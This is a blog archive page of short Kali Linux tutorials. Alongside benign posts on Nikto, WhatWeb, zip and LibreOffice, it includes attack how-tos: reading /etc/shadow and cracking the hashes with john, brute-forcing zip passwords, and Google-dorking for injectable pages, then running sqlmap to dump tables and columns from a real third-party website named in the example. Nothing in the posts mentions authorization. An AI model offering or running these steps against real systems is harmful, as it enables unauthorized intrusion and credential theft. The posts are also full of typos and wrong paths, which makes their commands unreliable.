Skip to main content

Posts

Showing posts from April, 2019

Nikto Web Pen tester

                    Nikto The  Nikto  web server scanner is a security  tool  that will test a web site for thousands of possible security issues. Including dangerous files, misconfigured services, vulnerable scripts, and other issues. ... These plugins are frequently updated with new security checks.  Nikto  is by no means a stealthy  tool . Type nikto for help Info                        See A web site info with port                nikto -h <url> -p <port> You can Save result in any format             nikto -h <url > -p <port no> -o <output file name> -f <format name>                                                                                                         Written By Sanjay kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                    
                 Whois website information type whois for help info           whois type whois <url>              to see website information                                                                                                               Written By Sanjay Kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                                                                                                         https://www.facebook.com/mang786                                                                                                        https://www.linkedin.com/in/sanjaykumar111/

Whatweb

                     Whatweb web pen-testing tools Type wahtweb see help configuration   "whatweb-l" see list of all services           "whatweb <url > " to see url information         see the verbose of any sites "whatweb -v <url>     whatweb -a 3 <url> or whatweb -a 4 <url > and so on it may in any no that will give ore info                                                                                                                 Written By Sanjay Kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                                                                                                         https://www.facebook.com/mang786                                                

Zip a folder by terminal

                    Zip a folder by terminal Frist you need to install zip tool if you are using Kali Linux  zip tool is pre install so you don't need to install to zip tool ... if you are using Debian Linux " apt-get install zip "             see help configure..           zip a file or zip of any data              type  " zip <name of zip> <name of data and its loacaton> " create an encrypted zip by terminal                command is                     zip -e <name of zip file > <data you want to encrypt>                    e=enrypt                where pass  is a name of the zip file and       pass1.txt is the   name of data or file               it ask password and ask to confirm                                                                                                       Written By Sanjay Kumar                                                             

How TO create/adduser in Linux

                     How TO delete/adduser in Linux  open terminal type                      cat /etc/password                     "to show all user account"    step2: type adduser <username>                  ex     Added account Lisa    it will ask password what password want to give           Created Account you can see "cat /etc/password" all list of users                      how to Delete account in Linux System first type "cat /etc/password" see which account want to delete                 "deluser <username>"                                                                                                                              Written By Sanjay Kumar                                                                                                                                            https://www.insta

How To find out password hash file and how to decrypt it

                        How To find out password hash file and how to decrypt it  First Open terminal and type  cat /etc/shadow  or more /etc/shadow or less /etc/shadow       by above commands, you can see all list of user and those accounts hash password in md5     format we have two tool inbuild in kali Linux System  john johnny       when you are using john simply type                  john <location of file>                 so i typed john /etc/shadow                  "/etc/shadow is  location of shadow file of all users "                just john cracked 3 user account password       i am using easy password so john cracked easily             3.  if you are using advance password then it would take hour now i am using johnny to crack password johnny is gui based tool to crack passwords in Kali linux               first copy users accoun

crack wifi with Cowpatty

                                crack wifi with Cowpatty                                                                                                      Written By Sanjay Kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                                                                                                         https://www.facebook.com/mang786                                                                                                        https://www.linkedin.com/in/sanjaykumar111/

crack wifi with aircrack-ng

                                  crack wifi with aircrack-ng                                                                                                    Written By Sanjay Kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                                                                                                         https://www.facebook.com/mang786                                                                                                        https://www.linkedin.com/in/sanjaykumar111/

How To fix Issue On vlc

                             fix Issue On vlc open terminal type vlc if working then it will open  if not working type               sed -i 's/geteuid/getppid/g' /user/bin/vlc                            see video for more                                                                                                            Written By Sanjay Kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                                                                                                         https://www.facebook.com/mang786                                                                                                        https://www.linkedin.com/in/sanjaykumar111/

How To crack Password Of Zip File

                             crack Password Of Zip File first open terminal type frackzip --help                 See all the USAGE description                type                frcarckzip -u -D -p <dictionay > <zip file>                  -D = use for dictionay attack                  -p = find out password password is 123456            for more description please watch the video in the below and share it for study purpose                                                                                                           Written By Sanjay Kumar                                                                                                                                            https://www.instagram.com/sanjayer111/                                                                                                         https://www.facebook.com/mang786                                                      

how to install LibreOffice

                            how to install LibreOffice This article describes how to install LibreOffice 6.2 on Debian/Ubuntu-based Linux distributions, such as Linux Mint, Xubuntu, Kubuntu, Debian and Ubuntu if you install with deb package go to https://www.libreoffice.org/download/download/ download package according to need if you are using a Debian system like Ubuntu, Kali Linux you have to download  deb  package after download deb package open terminal sudo dpkg -i *.deb it will select all package  Remove bundled LibreOffice LibreOffice 6.2 can be installed alongside older LibreOffice versions, but conflicts may occur. To remove prior installations of LibreOffice: sudo apt-get remove libreoffice-core If you also want to remove LibreOffice configuration files, use the purge switch: sudo apt-get remove --purge libreoffice-core

sqlmap tutorial

                                            sqlmap tutorial  Check vulnerable website                     '' type in google ? php id ==1 " open terminal sqlmap go to help option SQLMAP ....                type   "sqlmap -u <url> --dbs"                --dbs = use for show database  then  sqlmap show website vulnerability            then enter on that directory            type "sqlmap -u <url> -D <directory> --tables"             tables = Show table attributes In which table you want to access type  "-T"             "sqlmap -u http://www.asfaa.org/members.php?id=1 -D information_schema -T FILES --                    columns "           Columns =  Show  Columns  attributes  To access columns type synatax == '-C'                  "  sqlmap -u <url > -D <directory> -T <table attributes&